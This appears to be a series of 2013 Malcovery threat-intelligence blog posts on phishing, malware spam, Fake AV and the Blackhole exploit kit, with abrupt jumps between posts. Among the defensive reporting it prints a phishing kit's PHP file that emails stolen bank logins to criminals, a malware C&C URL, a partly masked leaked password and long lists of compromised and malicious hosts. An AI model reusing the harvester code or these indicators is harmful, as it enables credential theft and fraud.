The spam messages started flowing shortly before 9 AM, and by 10:30 we had received 548 copies of a spam email that looked like this:

The subject line was always "Fraud Alert: Irregular Card Activity"

The From address was always "American Express (fraud@aexp.com)"

But the highlighted link that claims it will take you to https://www.americanexpress.com/ actually goes to one of 419 URLs on one of 57 compromised webservers. The list of servers is:

0067959.netsolhost.com
02fbd07.netsolhost.com
119.245.150.94
184.168.170.184
188.165.206.52
209.173.242.165
anggieystratega.com
bentleycrossing.com
bluestreakfinancial.com
bobjonesaccounting.com
certificaat.ledtechno.be
copyrman.site.aplus.net
criminalsearchcanada.com
dinnerat8.mywebcommunity.org
durushayakkabi.com
entertainindy.com
etbroderi.no
expert-log.com
fassion.toypark.in
feuerwehr-queckborn.de
flat.bplaced.net
fmax.in.th
ftp.ccmanitowoc.org
ftp.likvidace-aut.cz
ftp.selectstl.com
idealmobilemedia.com
mircomultimedia.com
missionwild.ieasysite.com
orbitek.hosting24.com.au
peterottenzonwering.nl
pm.vertigry.com
proteebar.com
quarksocial.net
russiantheatre.ca
secomimages.co.uk
shiragellman.com
spanglaw.www65.a2hosting.com
sprintcar1.com
swansonhaskamp.com
tastemasters.de
tvbox.veria.eu
user4634.vs.easily.co.uk
w7u20zuyb.homepage.t-online.de
walegion.comcastbiz.net
watertechnology.gr
wer1globle.com
www.59-90.com
www.contactl.www66.a2hosting.com
www.g4amt.com
www.myspringriver.com
www.purecoat.com
www.qigong-yangsheng-koeln.de
www.regionshg.com
www.teammoutai.com
www.yardvilleheights.com
www.zen65048.zen.co.uk
yourbabyname.awardspace.com

/lipid/index.html
/juno/index.html
/tarnished/index.html
/linker/index.html
/musicologist/index.html
/village/index.html
/mered/index.html
/satan/index.html
/laconic/index.html
/parsons/index.html
/strayed/index.html

 http://184.177.180.52/boers/ghostwrote.js
 http://194.15.212.104/hemispherical/inbounding.js
 http://208.106.191.91/glamored/pans.js
 http://ghanamusicbox.com/crystallization/carcinomas.js
 http://hamidebirsengur.com.tr/honduras/wildernesses.js
 http://kaindustries.comcastbiz.net/imaginable/emulsion.js
 http://msco-iraq.com/chervil/capturing.js
 http://naturesfinest.eu/eroding/patricians.js
 http://portel.home.pl/aborigines/nerveless.js
 http://winklersmagicwarehouse.com/handmade/analects.js
 http://www.greenerhomesnortheast.co.uk/jacksonian/barrettes.js
 http://zuniweb.com/burliest/squeaking.js

steelhorsecomputers[.]net/americanexpress/
birddogpaperandhome[.]com/americanexpress/
cyfairfamilyfest[.]com/americanexpress/

Here's the Phish Walk Through once we finally arrive at one of the three destination phishing sites:

First they ask for the Userid and password

Then the Social Security number, your birthdate, your mother's maiden name, her birthdate, and a PIN.

Now the card number . . .

And the expiration date . . .

And finally your 5,000 Reward points are awarded, and you are forwarded to the actual AmEx page.

So, to gather the userid and password of a few hundred American Express card holders, the phisher today was willing and able to break in to SEVENTY web servers ... 57 used in the spam ... 10 more used for the JavaScript Redirection scrips ... and 3 used for the actual phishing hosts.

Quite an elaborate scheme. We'll be talking about MORE elaborate phishing schemes and webserver compromises in our Malcovery Webinar on Halloween Day, October 31, 2013 @ 1:00 Eastern / noon Central -- How Threat Intelligence Reveals The Scariest Cyber Attacks" -- (click the link to Register)

The emails had a wide variety of subjects and were coming in fast and furious around 4:00 this morning:

A query in the Malcovery Spam Data Mine shows the variety of subjects used in the campaign:

count |                  subject                   
-------+--------------------------------------------
    90 | Someone showed me your picture
    86 | I love your picture!
    85 | This is the funniest picture ever!
    85 | What you think of this picture?
    84 | You look so beautiful on this picture
    80 | Tell me what you think of this picture
    78 | You should take a look at this picture
    78 | Take a look at my new picture please
    75 | Is this you??
    69 | Someone told me it's your picture
    66 | Should I upload this picture on facebook?
    62 | Picture of you??
    50 | Your friends won't be happy about that
    48 | My private picture only for you
    47 | Private
    46 | Your picture is all over the web now
    44 | Keep it secret
    43 | Keep it private
    43 | Could you explain please?
    43 | Do you think I'm attractive?
    41 | Photo of you naked??
    40 | Do you think I'm 'pretty or ugly?
    40 | My private photo for you
    39 | Do you think she is hot?
    37 | Hey check out this picture
    37 | I just can't belive this
    35 | You look terrible on this photo
    35 | I found this picture of you
    35 | My private picture
    35 | To show how much I love you
    35 | Please rate my picture
    35 | Your wife won't be happy about that
    34 | How do you think she looks?
    34 | Please tell me this is your photo
    33 | Shame on you
    31 | Your opinion needed
    30 | Check out my photo but keep it private
    26 | I love you so much please check my photo
    22 | My private photo
    11 | What you think about my halloween costume
     7 | Your wife wont like this picture
     7 | Happy Halloween
     6 | Check this out!!
     6 | Best halloween costume
     6 | Your wife will be shoked
     6 | Worst picture ever!
     5 | Private picture of you?
     5 | Biggest pumpkin lol
     5 | Halloween costume
     4 | You are fucking ugly
     4 | Biggest fail of the month
     4 | Best halloween costume ever
     4 | You are so sexy
     3 | Are you crazy??
     3 | Naked picture of you
     3 | You like my halloween costume??
     3 | WTF?
     3 | Busted you naked
     3 | WOW WTF is this???
     2 | Please explain??
     2 | Let me know if this is really your picture
     2 | Check out my halloween costume
     2 | Seen this shit before??
     2 | LOL
     1 | Spam: My private photo
     1 | Can't belive this!
(66 rows)

I won't go into the technical details of how it works, but the ZIP file contained an SCR file -- an old filetype that used to be a common way for people to share "Screen Saver" files. Trying to "view" the Image file from inside the .ZIP actually results in the .SCR file being executed, and downloading and executing the file "soft.exe" from the website at 91.216.163.208 as you can see from this code-dump of the SCR file.

The file failed to run in our default analysis Sandbox so we had to break out the Raw Iron ... since the malware was being so paranoid, I used a camera to document what came next rather than taking screenshots in the program.

The Fake AV was called "AntiVirus Security Pro" and popped up in the typical fashion to run a "Full Scan" of my system:

While it was running a pulled a running process name and found that the malware had copied itself to my "Local Settings\Temp" directory and was running from there with the name "dnn9d9n39dn93nd39b9d393d3bdb.exe" (as you can see in the CMD window behind the scan above.) That file was 569,344 bytes in size.

After the scan completed, I went ahead and told it to Repair All of the threats it had found.

Unfortunately, it failed to repair some of the infections, because I was running a "limited version" of Antivirus Security Pro.

But there is HOPE! Even though "Not all threats have been eliminated." I could "Buy Full Edition" to fix the remaining 19 threats! What a relief!

When I chose not to do that right away, the Fake AV popped up occasional helpful HINTs that said "We strongly recommend activating full edition of your antivirus software for repairing threats."

Pretty darn expensive Fake AV! To the authors - please note that you are more likely to get the $99.99 for a LIFETIME license as opposed to six months. Nobody is going to pay $59.99 for a 30 days license, but we also aren't going to pay $99.99 for only 6 months! Maybe you could try 1 year, 2 year, 5 year?

Sadly, my credit card didn't clear. I'm shocked. I tried really hard to make up a valid card number! The good news is that the "Antivirus Tech Support" link on my desktop would take me back to the shop anytime I wanted to try again by visiting "techprotectorltd.com":

Fake AV IS A CRIME! REPORT IT!

(Image from Group-IB)

The MVD link, provided by Brian and Google Translated here, shows that a group of 13 criminals were all arrested for violation of Russia's criminal code Article 1.2.210 "the creation of and participation in a criminal organization to jointly commit one or more serious crimes". In other words, Paunch and friends have been charged with the Russian version of the RICO Act! We've just recently seen the same TYPE of law used in the US in the case of David Camez, who was charged with racketeering and conspiracy charges for his role in the crimes at Carder.su (he is one of 55 defendants in the case, and the first to go to trial...) More on Carder.su's David Camez's RICO case here.

The speculations that something may have been up with Paunch began back in October. The best early coverage we had was from Charlie Osborne, who posted over on ZDNet Blackhole malware toolkit creator Paunch suspect arrested, based off the single tip that every other source we had was also referring to -- a statement from Maarten Boone over at Fox-IT in the Netherlands.

At the time of the article in ZDNet, October 9th, Charlie quoted AVG as saying that "the Blackhole Exploit Kit is currently ranked 24th in the world of online malware, affecting 36,199 websites in 218 countries." The same link provided in that article now shows that BEH is ranked 161st, falling from position 132 on the list last week. To check the current status, use this link to AVG's AVG Info on Blackhole Exploit Kit.

Paunch posted updates about his malicious code as recently as September 2013, on Exploit.in (sorry, login required!) As usual, the authors shamelessly listed their contact information, which of course lead to their downfall:

Our contacts:
Author and a support в 1 лице (time normalized):
JID: paunch@jabber.no
JID: paunch@thesecure.biz
JID: paunch@neko.im
ICQ: 343002

A support (time from 9 to 19 on weekdays)
JID: blackhole2@jabber.ru
ICQ: 530082 

happy to announce that prices have remained the same:
Rent on our server:
-Day rental - $ 50 (limit traffic 50k hits)
-Week rent - $ 200 (limit traffic 70k hits a day)
-Month lease - $ 500 (limit traffic 70k hits a day) if need traffic limit can be increased for an additional fee

License on your server:
-License for 3 months $ 700
License-half year $ 1,000
-Year license for $ 1500
multi-domain version of the bunch - $ 200 one-time fee for the entire term of the license (not binding on the domain and on the ip)
change of the domain on the standard version of the bunch - $ 20
change ip on multidomain version bundles - $ 50
single cleaning - $ 50
Autoclean a month - $ 300

The new version offered many options, including statistics about Windows 8 and Mobile Device infection, an option to have "less obvious" URLs for your Blackhole Exploit address, and the ability to automatically regenerate your .exe files in ways that would not be detected by AV engines. (This feature is the "Autoclean" offered for $300 per month.)

Many security features of the "auto-ban" variety were included to prevent the malware from functioning for "Reversers". These included:

11. Completely updated section "Security" on it can shine even a sub category:
a) an opportunity to block traffic without referrer (we recommend always keep it turned on)
b) the opportunity to ban unnecessary referrers
c) an opportunity to ban all referrers except your own
d) an opportunity to ban bots on the basis of a pre-arranged IP address list
d) an opportunity to ban TOR network Types which are dynamically updated as the practice most reverser work from there (we recommend always keep it turned on)
e) there was a recording mode, let you stop and wait for traffic traffic from where you do not, put the record mode, and all reversers and bots that go on your link after stopping cores go straight to the ban list)
12. Since section 11 we had a lot of opportunities for Bans, selecting at least one embodiment of the ban appears in the menu "Ban Statistics", in which you can see the number of blocked traffic, and the reason for blocking 

(Right-Click, "View Image" for larger version)

Much, much more data is available in the several-times daily "Malcovery T3 Reports" and additional analysis is available for interested parties. This data is ONLY showing the "/forum/viewtopic.php" aspects of this malware.

In the first column, the date of the spam campaign and the "imitated brand" is listed

Malcovery Security 2014 Prediction #9: Phishing will hit hard in the emerging online banking markets in India and China

This prediction is based on a few things. The criminals in the phishing world are international. Although most phishing victims continue to be in the United States at the present time, the reason for this is the widespread availability of high-speed Internet and the prominence of Online Banking. As China and India, who between them represent 36.5% of the world population, increasingly embrace online banking the criminals of the world will turn their eyes to this population who is now banking online, but who does not have decades of experience with Internet Safety issues leading up to them. I've already received some questions about this prediction, so I thought I would share some feedback on this one by showing some of the visibility we have in PhishIQ to the issue.

The basic work, unfortunately, has already been done for preparing to attack the Indian banks. Phishing kits exist and are in circulation for at least forty Indian banks that we have seen at Malcovery just during the previous month!

e-Police India shared a phishing attack on their website at the beginning of November about a phishing campaign imitating the Reserve Bank of India. In this phishing attack, the spammers have indicated that you need to "Select Your Bank From the List Below to Complete Your OAC Registration Process". Malcovery has seen this kit several times, including for example a live version today on "thedelamere.co.uk".

For each of the icons on the list below, a full corresponding phishing site is offered. For some reason, the "western" banks on the list do NOT go to a phishing site, but provide a link directly to the brand indicated, These "non-phish" (mostly western banks, but some Indian as well) would include Barclays, Citibank, Deutsche Bank, Karnataka Bank, Karur Vysya Bank, Lakshmi Vilas Bank, RBS, Standard Charter, and Tamilnad Mercantile Bank.

(Screen shot of phish on "thedelamere.co.uk")

The same set of phishing files is regularly occurring in our Phishing intelligence system with more than 80 websites having been hacked to host these files.

Because Malcovery is REALLY good at recovering phishing kits, we were able to recover the criminals' email addresses in 15 of the 80 websites. akachi16akachi16@sify.com, akachiugonna@rediffmail.com, and akachiugonna@sify.com were found in 11 of those 15.

In November, the "action file" of these phish sent email to four email addresses, as shown above, and as observed by the investigators at e-Police.in. More recently, the "chizobamyluck@gmail.com" address has been excluded from the kit.

For example, for the phishing site:

The action file was:

<$fromemail = "$ip";
$ip = getenv("REMOTE_ADDR");
$message  = "-----------------+ Andhra Bank Details +-----------------\n";
$message .= "User Id: " .$_POST['user']."\n";
$message .= "Password: " .$_POST['pass1']."\n";
$message .= "Transaction Password: " .$_POST['pass2']."\n";
$message .= "Mobile: " .$_POST['mobile']."\n";
$message .= "Client IP      : $ip\n";
$message .= "-----------------+ Created in 2012 By DON PERO------------------\n";

$recipient = "akachi16akachi16@sify.com, akachiugonna@rediffmail.com, 
akachiugonna@sify.com, chizobamyluck@gmail.com";
$subject = "Andhra $ip";
$headers = "From: admin@gameshack.org";
$headers .= $fromemail."\n";
$headers .= "MIME-Version: 1.0\n";

if (mail($recipient,$subject,$message,$headers))	
   {		   header("Location: http://andhrabank.com");	   }else    

	   { 		echo "ERROR! Please go back and try again.";  	   }>

The source was South China Morning Post, which has actually been writing about this for some time. On October 11, Amy Li reported that "Home Inn Hotels" a popular discount chain, and Hanting Hotel Group, were using "faulty hotel management software" developed by CNWISDOM. This was reported by "independent internet security watchdog Wuyun.org". The NASDAQ traded hotel chain eventually acknowledged the vulnerability, which they described as a weakness in their Wireless Portal Security System, and announced on their home page that the issue had been resolved, thanking WooYun for helping them with the vulnerability.

CNWisdom Data Leaks

As reported in Patrick Boehler December 9th story in the South China Morning Post, Chinese Hackers Leak Hotel Guest Data on WeChat, multiple websites were distributing the hotel data for 20 million guests, and some enterprising hackers had even built a chat interface allowing you to TXT someone's ID card number to the service and having it reply with the details of any hotel stays by that guest.

WooYun

WooYun-2013-41171 (submitted October 28, 2013) - which referred to an SQL injection vulnerability

WooYun-2013-41171 (submitted October 27, 2013) - which referred to a STRUCTS problem

WooYun-2013-034935 (submitted August 21, 2013) - the WiFi Data Leak

Unfortunately, I have to rely on some Google Translate here ...

The way WooYun explains it is (Gary's paraphrase of the Google Translate of what they said:)

"Users connect to their hotel's open WiFi, which requires them to use a webpage to authenticate. That webpage is using http protocol, which means the username and password are transmitted in the clear. But the next phase of the authentication is to update a central database of WiFi information. IN THE CLEAR, the authentication connects to a database using the username "cnwisdomapi" and the password "3b823[马赛克]ac36a"!!

After the media used this screen shot in their reports, the Hotel chain responding saying that the screen shot did not represent personal information of their guests.

The "Vulnerability Response" section says that the vendor was notified and confirmed the vulnerability on August 26th. On October 8th, they replied that the Vulnerabilities had been repaired and a proper authentication method that preserved encryption throughout the process to protect guests had been implemented.

WooYun and 189

The same breach reported also shared details on how any one could access a webserver on "wapsc.189.cn:8006" and use the "wapLogin/sendSms.action" to send unauthenticated SMS messages to any cell phone!

In a wonderful example of responsible reporting, WooYun declared the vulnerability to be "Level 20" (their highest rank) and reported the details to the CNCERT National Internet Emergency Center on January 22 prior to releasing the details publicly on March 8, 2013.

Malcovery Security has been putting out daily reports of the Top Threat Today in the malicious email world for all of 2013 (although at the beginning of the year they were still using their UAB-legacy name "Emerging Threats By Email"). These reports provide a "deep dive" look at the most prominent malware-laden email of the day. Mid-summer we made the determination that in addition to pushing out "THE" top threat, we would look at other significant malware campaigns of the day, and try to get those reports out faster and in a machine-consumable format.

Last week we presented a one-hour Webinar (still accessible, if you'd like to watch/listen to the recording) - State of Cybersecurity 2013/2014. The first 2/3rds of the webinar walks through the significant cybersecurity events of the year, followed by some Malcovery stats, like the chart shown below, followed by my Ten Security Predictions for 2014.

So, do we see LinkedIn spam as the most dangerous email "post-Paunch"? And for that matter, was it the most dangerous during the BlackHole dominated early portion of the year?

During the "Top Report of the Day" early part of the year, we saw WIDE variety of brands. In fact, in January our top reports included:

Adobe, ADP, American Airlines, BBB(4x), Bank of America, British Airways, Citibank, Digital Insights, DocuSign(2x), Dunn & Bradstreet, eFax, EFTPS (3x), FedEx, Facebook (2x), IRS, KeyBank, LinkedIn, PayPal, US Airways, Verizon, and Xerox.

LinkedIn earned the "Top Threat of the Day" position many times during the year, including January 21, April 9, April 10, July 26, August 28, September 27, and October 24. That is still less than ADP, which was the "Top Threat" on at least thirteen days (January 14, January 22, February 5, February 11, March 15, March 21, March 29, May 13, May 24, August 6, August 16, October 22, November 1st).

But what about the RECENT stuff? And how do things shape up when we look at ALL the significant malware threats we saw delivered by email instead of only "THE" top threat?

Malicious Spam Campaigns August 1 - December 13

40 Days ==> Wells Fargo (+10 Days as "Top Threat" - August 6, 9, 23, September 16, 24, October 14, 29, 30, November 27, December 11)
40 Days ==> FedEx (+ 7 Days as "Top Threat" - September 5, 9, 10, 11, 17 & October 4, 10, 30)
24 Days ==> ADP (+ "Top" on August 6, 16, October 22, November 1)
23 Days ==> Facebook (+ September 6, 27)
22 Days ==> HMRC (Her Majesty's Revenue & Customs) (+ October 21)
19 Days ==>"Picture" spam (+ October 23, November 8, 18, 22, December 10, 13)
16 Days ==> Royal Bank of Scotland
15 Days ==> Companies House UK
11 Days ==> Sage
10 Days ==> American Express
10 Days ==> HSBC
10 Days ==> LinkedIn (+ August 6, 16, October 22, November 1)
9 Days ==> Dun & Bradstreet

So what does "Most Dangerous" mean? I would certainly agree that a very-well crafted graphical LinkedIn invitation is more likely to be clicked on than a poorly worded letter from a Wells Fargo advisor with a .zip attachment that I'm supposed to open. It could be that WebSense's scoring system takes into account their observed "click-through and attempted click-through" rate, but our measure shows LinkedIn in 10th place as far as active malicious spam campaigns since August 1st, and only two days since the estimated arrest date of Paunch -- October 16th and October 24th.

Here are some details about recognizing compromised accounts for two recent scams -- "help identify the criminal" and "I quite my job, you should too!"

1. Facebook Friends want help identifying criminals

ysterday 2 guys tried to steal my car. have youguys seen them? Here is the vid

ysterday 4 blackguys tried to steal my car. do you guys know them? Here is there pics

2days agos 2 white boys broke in my moms car. does anyone of you know them? Here is there pics

2 days agos 2 dudes tried to steal my car. have youguys seen them? Here is the vid

This morningg 5 dudes broke into my sisters house. have youguys seen them? Here is the vid

ysterday 5 black boys tried to steal my brothers car. does anyone of you know them? Here is the vid

3days agos 2 guys broke into my house. have youguys seen them? Here is their profile

Earlier todayy 3 dudes beat my dad up. have youguys seen them? Here is their profile

What are the odds that poor RS has had 3 guys steal his car, 5 guys break into his sister's car, and 2 dudes break into his brothers house in one week? Poor guy! How can we help him?

2. Facebook Friends quitting their job

One of my grad students at UAB was the first one to tip me off to this scam after his wife showed him suspicious posts for her friend! Our lesson? If you write malware, don't let it tag people who have family members working for me!

Sometimes the messages were about the dumb boss, idiot boss, childish boss, asss of a boss.

Your friend my have been "generating around" or "making around" some random number of dollars, $100, $200, $250, $300 for some random number of months.

As you can see from SO's page, the same people who have lost control of their accounts for the first scam are also targeted by the second scam:

When I was searching for the unique spelling of "QUIT MY J OB" with the space in the word Job, I noticed the posts were also all over Twitter:

Twitter => Facebook version

Here is one of many dozens of examples where "JJ" had a twitter account that posts a link to a Facebook shortened "fb.me" link where JL has tagged seven of her friends in the message.

Instead of REPORTING THIS AS SUSPICIOUS, Her friend "Liked" the post!!!

AG had the same issue - his Twitter post sends traffic to the Facebook post, that sends to the Tumblr page.

VR's posts go the same way ... Twitter => Facebook => Tumblr

Quite a few other Twitter posts also send visitors to Facebook pages . . .

Twitter => Direct to Tumblr

Help your Facebook Friends?

First, use the "pull down" arrow at the top right of the message to choose "Report/Mark as Spam"

After you hit "Report", click the WORD "Report" underneath the message to give more context to your report.

Tell them that this is "Spam or Scam" and hit "Continue"

After you get your Thank You from Facebook's Security team, follow the link to "Help Center Security section"

On that link, choose "Hacked Accounts" -- Note: You can share this link with your friends by telling them to visit: HTTPS://WWW.FACEBOOK.COM/HELP/SECURITY/

There are several good sets of information that can help your friend with the hacked account, or help you learn more about helping your friends! Be the Security Expert in your group of friends, share this information with them!

Help your Twitter Friends?

What happens on the TUMBLR Pages?

The local news station, KOLO 8, contacted CostCo by telephone and received this automated warning:

"If you received an email concerning a delivery failure or cancellation: immediately delete the e-mail and do not reply. This is a phishing scam and was not sent by Costco. Costco is not affiliated with the e-mail in any way."

Here's the email that Marianne and hundreds of thousands of American Christmas shoppers have been receiving since December 19th at approximately 10 AM. The non-stop bombardment of spam continued throughout the day today, December 26th, and will likely continue tomorrow as well:

But it wasn't just CostCo. In fact, Walmart and BestBuy were also used in this spam campaign with emails that looked like these:

Each day the Malcovery Spam Data Mine processes more than a million spam email messages searching for dangerous threats like these and our analysts evaluate the threats and provide intelligence to customers to help them protect themselves. In this case, Malcovery has seen more than 3,000 copies of these "Delivery" emails, which come with one of several prominent Subject lines:

• Express Delivery Failure
• Standard Delivery Failure
• Scheduled Home Delivery Problem
• Delivery Canceling
• Special Order Delivery Problem
• Expedited Delivery Problem
• Expedited Delivery Problem

The spam messages are being sent out by the ASProx spam-sending botnet. Although the emails can come from any username and any domain, the "Sender Name" (the human-friendly portion of the "From" address) has been consistent as one of these:

• Best Buy
• Best Buy Shipping Agent
• Costco
• Costco Shipping Agent
• Costco Shipping Manager
• Walmart
• Walmart Delivery
• Walmart Delivery Agent

What would happen if someone clicked on one of these emails? The actual destination would depend on which date and which email type they clicked on, but we have collected a fairly extensive list of destination websites. A full list of the 636 compromised websites that we have seen so far in this campaign is listed at the very end of this article. Just in the past four hours we've seen spam samples that went to each of these websites:

kinderopvangnatuurlijk.nl       
 radomir.lt                      
 kaufhaus-myklick.de             
 quranrazavi.ir                  
 puertaselectricasof.com         
 pryozerne.com                   
 proschild24.com                 
 profi-poz.pl                    
 profilaktica.tv                 
 preventia.nl                    
 priroda.by                      
 pratabong.com                   
 palswebservice.com              
 pravoslavie-hristianstvo.ru     
 pornoholigans.com               
 polarcol.com                    
 polluxautos.nl                  
 porncontent.nl                  
 podiodemo.aalilaa.com           
 ponorogozone.com                

/media/Zo6es/bMNyDwcSdtDF1IPBaXWwNlBiBFq/kCUlscSGI=/WalmartForm
/media/J4oHEmjaJvBvrdXTz3KJ5i7G46NP5/dGAYZ5aN4O qs=/CostcoForm
/media/fs1vp YmmEnb7Z6ftU5jKPU7X9Gc3DsasqKZPCIooRc=/WalmartForm
/media/9mz6i EkIDix5uVIAMa4AuEYNuNf18/32d3lFXUnyIQ=/CostcoForm
The "message" path (and the two BestBuy Forms) were more common earlier in the campaign. In fact, on the 19th, we ONLY saw BestBuy samples of the spam:

/message/zZFXQdfn98Ze1SQS7s6a9/yldS qZDpeIXu2C4RRif8=/BbForm
/message/ByundeWiiEoYMllShj48YUj2k53Nndy0jf2mDPhJdNI=/WalmartForm
/message/xERnC10Jrrv0FedQUPsBkZcIonAwqG6e9vMULe1vDkw=/BestBuyForm

What happens first is that the website prompts the visitor to save or open the file "WalmartForm.zip" (or whichever form they have visited.)

If they choose "Open" it will show them that there is a form to be extracted within the .zip file.

If extracted or moved to the Desktop, the form will display a comforting Microsoft Word logo, despite the ".exe" extension

If the visitor tries to open the WalMartForm.exe program, they will get an error message, which is actually a file called WalmartForm.txt opening in Notepad:

If we check memory though, the program "WalMartForm.exe" has spawned an instance of "svchost.exe" which has some very interesting strings, including:

 http://192.210.142.87:8080/709E5B7E58D806F5837DA791871C5FD8EF71A1A7F2

That IP is believed to be the Command & Control (C&C) server to which my infected computer instance is talking.

Other interesting strings include a "knock" tag:

(knock)(id)709E5B7E71F412D245208000C3208388(/id)
       (group)2612r(/group)
       (src)21(/src)
       (transport)0(/transport)
       (time)-194855676(/time)
       (version)1281(/version)
       (status)0(/status)
       (debug)5.1 x32  none  none(/debug)(/knock)

C:\Documents and Settings\Owner\Local Settings\Application Data\kinwmeiq.exe

And a tag that SEEMS to show the username of the malware author, though I'll not include that here . . .

Note that even though this malware distribution campaign has been running for at least seven days, many major anti-virus products are still unable to detect the malware as being malicious. A VirusTotal report showed that only 20 of 48 anti-virus products currently detect the malware that I received when visiting the most recent website seen in spam. Neither of the two locally installed AV products on my machine detect the malware, and the URL I attempted to visit was not marked as dangerous by any of the systems I have installed. VirusTotal Report here.

Hacked websites used to Deliver Delivery malware

12zuilen.com
1clicksoeasy.com
235concept.com
2emamzadegan.com
3tm.org
4wedding.in.ua
555robogo.hu
8888.ru
911-experience.nl
aa.tukums.lv
aaronsautomatedclassroom.com
aayushivfraipur.com
abc-f.com.ua
acciongranate.com
ace.amiworks.co.in
acod.digitalgeneration.be
acrideme.co.mz
addvo.ru
adventistfamily.net
aesthetic-dentistry-travel.com
africinworld.net
ag376.us
ahangerooz.com
ahbrownlibrary.org
ahpamt.com
ahr-fund.com
akhals.com
albergoquisisana.it
albertheijnwijkerbaan.nl
alecro.nl
alexian.com
algofacil.orgs.pe
almexterminatinginc.com
alphaomedia.org
alphaservices.co.in
alstudios.net
aluracks.be
amateurpov.nl
ame.edu.lr
americanexceptionalism.com
amgsmit.nl
amigosporelkartismo.com
andeandiscovery.com
andysarcade.de
angelinaconsignment.com
angelleinsurance.com
anoesjkasmoveon.nl
antonidesmedia.nl
antoniofalduto.it
antonio-vitolo.de
apishosting.com
aproshop.hu
aquadistri-china.com
aquafarminternational.com
aquafora.nl
arbobhv.com
arcobriga.com
arefeens.com
areyousavedtour.com
arino.de
arnoldonline.eu
artartel.ru
artexpotema.com
art-lenimarx.de
ascoelda.nl
asiancarcenter.net
asooneh.ir
astarta-group.ru
atades.com
atena-tile.ir
atlanticfitnessproducts.com
attento-systems.de
ausprogroup.com.au
autobedrijfleidscherijn.nl
autobike.tw
autocadtekenaar.nl
automartin.com
autoteile-online-shop24.de
avast.softvisia.com
avtoshkola-v-moskve.ru
awardcom.net
awaylifecommunications.com
aziendagricolacosta.it
backend.myamcat.com
balance-kettwig.de
ballandautreyancestry.com
baltiyskayasloboda.ru
barbarameszaros.com
bbkdw.com
bcstrikebusters.de
bear-tail.net
bella-signorina.nl
bermejo.be
bexeeco.com
bierwinkeltje.nl
bloemenhof-heemstede.nl
blueorangeapps.com
blueskyworksstudios.com
bmaschool.net
bodyandskincenter.be
boerenheerlijkheid.nl
boerenrock.fm
bosma.com
bphn.go.id
brandschutz-poenitz.de
breslavtsev.com
bright-color.de
bright-on-design.co.uk
brillenhuis.nl
bruggejudo.be
brugwaarde.nl
btw-nummer-controleren.nl
btwnummers.be
budapestivillanyszerelo.hu
businessmaturity.nl
butikispot.com
bvlemmer.nl
cafe-boehlig.de
callabook.ru
callshop-discount.de
camspleetje.com
canceris.net
capital-incentive.com
careercompasscanada.com
carinvandenberg.nl
carolinaalpacafarms.org
carrefoursteusebe.com
castlekeepdanes.com
cgrc.org
challenge-center.org
chazeaux.com
cher.ec-jugend.de
chezjeanpartyservice.nl
chiduong.net
chooyilin.com
christianfamily.net
christliche-devotionalien.de
cinefocus.nl
citrusempirewebdev.com
cjays.nl
cmjardim.com.br
cocoxiang.com
coleon.ru
collectorsfair.nl
conectareus.es
confitt.de
constructii24.ro
consultoriasocial.com
convertidosacristo.org
corrado-club.nl
costa-development.nl
costa-smeralda-sardinia.com
country-freunde-nesselroeden.de
coxengines.eu
coyotepetanquetour.com
cpmerced.com
crea3x7.mx
creativefill.com
creative-interchange.com
creatures.gr
ctechmetrology.com
cuahanghieu.com
cyndiknill.ca
daalbhaat.com
dafhobby.nl
da-fortunato.de
dansgroepsplinter.be
dcb-substrate.com
deborahharrisinc.com
deeterinkbetonwerken.nl
Deko-Kerze.de
demo-design.nl
deutscheq.de
dianaostariz.com
diceonice.com
dietweetest.nl
directadvies.info
directcorp.de
diseclick.tk
distillator66.ru
djet.by
dmwgalvano.nl
dohodbezriska.ru
dokterfred.be
dongle2bin.com
doorenmalen.nl
dosmundostravel.com
dr-bekele.de
drpind.com
dscorpio.com
duapulos.com
eatecnologia.com.br
ebbinghaus-gewinnspiel.de
ebrahimiclinic.com
echocentrumamsterdam.nl
economistasmurcia.es
effectivemarketing.be
egypt4all.com
ehbo-zieuwent.nl
eierbettelnleissling.de
eijlders.net
electricmattresspadreview.com
eleganceorganizasyon.com
ellsshop.nl
emthesisconsulting.com
energotorg.com.ua
energyartgroup.com
engels-konzertbuero.de
eniac.net
enmarkservices.com
e-oksi.ru
epicschool.com
equinoxinnovations.com
equipenordestebrasil.com.br
e-quit.co.uk
erwinvandewiel.nl
esector.co
esmee.es
espaciosvintage.cl
esperanza-cafe.de
espinosagomez.com
esscortgreek.com
ethaarle.nl
evacuaid.nl
evergreenbuddhist.com
evociente.nl
ewfoods.com
excipientfest.com
explode7.com
eyco.org
ezdevajasooneh.com
f1ltracers.lt
fabgiftidea.com
fabrykakatalogow.pl
fahrfreunde.de
fakita.com
famdiffusion.ch
farbenscheibe.de
fasaltrading.com
fashionfloorz.com
fastproinvestments.nl
fccr.org.br
fceibergen.nl
fcr-jugend.de
feathersonwings.com
feichtinger-wurst.at
feldmochinger-hof.eu
fengshui-eschke.de
feriasnoriodejaneiro.com.br
fewo-haus-fuchs.de
fewo-labo.de
ff-altmannstein.de
fgh-co.ir
fgz-heidelberg.de
fidesgroup.es
fietsenineuropa.nl
final-fight.net
financialarchitects.us
finanzen-und-kredite24.de
finde-immobilien.de
fineafricasafaris.com
finishlinebuilders.com
fisch-schmidt.de
fiseon.com
flcams.com
fleer-ellerbrake.de
flicflac-mannheim.de
florarbo.com
florarie.kikirara.jp
flybowshop.com
fm.utopica.com
foodinnmobile.lpipl.com
footballmoves.com
forestshores.com
fotobox-lenthe.de
fotografie-schwelm.de
franckviviani.fr
frankenturm-trier.de
fransvanloon.com
frantoio-ramoino.com
fratresmugello.it
frederique-magnetiseur.fr
frevert-almena.de
friesekoers.nl
front404.com
froschtempel.de
fr-project.fr
fsg-pforzheim.de
fujisawa-shinya.com
funeralgravestonesandmemorialplaques.com
fysiofits.nl
galerie-rekonquista.de
galeritenuntroso.com
garage-silvestre.com
garageviaene.be
gas-zaragoza.net
gbnf.edu.co
gbrsas.com
gdp.aalilaa.com
gente1.com
gepassioneerdeeindgebruikers.nl
getfoundlocally.info
ghostwriter-sm.de
ghscowboys.com
gidroponika.pro
gipack.it
glavmel.ru
glcalpacaplace.com
goedkope-webcamsex.nl
goodnightdrink.mv
good-relation.de
gorganonline.com
graymankin.com
greatwhitegoldens.com
greendatahosting.com.au
green-fuel.us
grmt.net
growthdevelopmentpartners.com
grupofef.com.br
grup-yakamoz.de
hallandwilliamson.com
hameleon76.ru
hangvietgiatot.com
harms-melzer.de
hartvanleerdam.nl
hasanbaranatas.com
hausaerzte-bremen.de
healthycolontoday.com
heli-online.com
hellobaby.kz
herefordesign.com
hetofde.nl
hickscsc.com
hi-ns.com
hoegy.de
hoffmans-leder.de
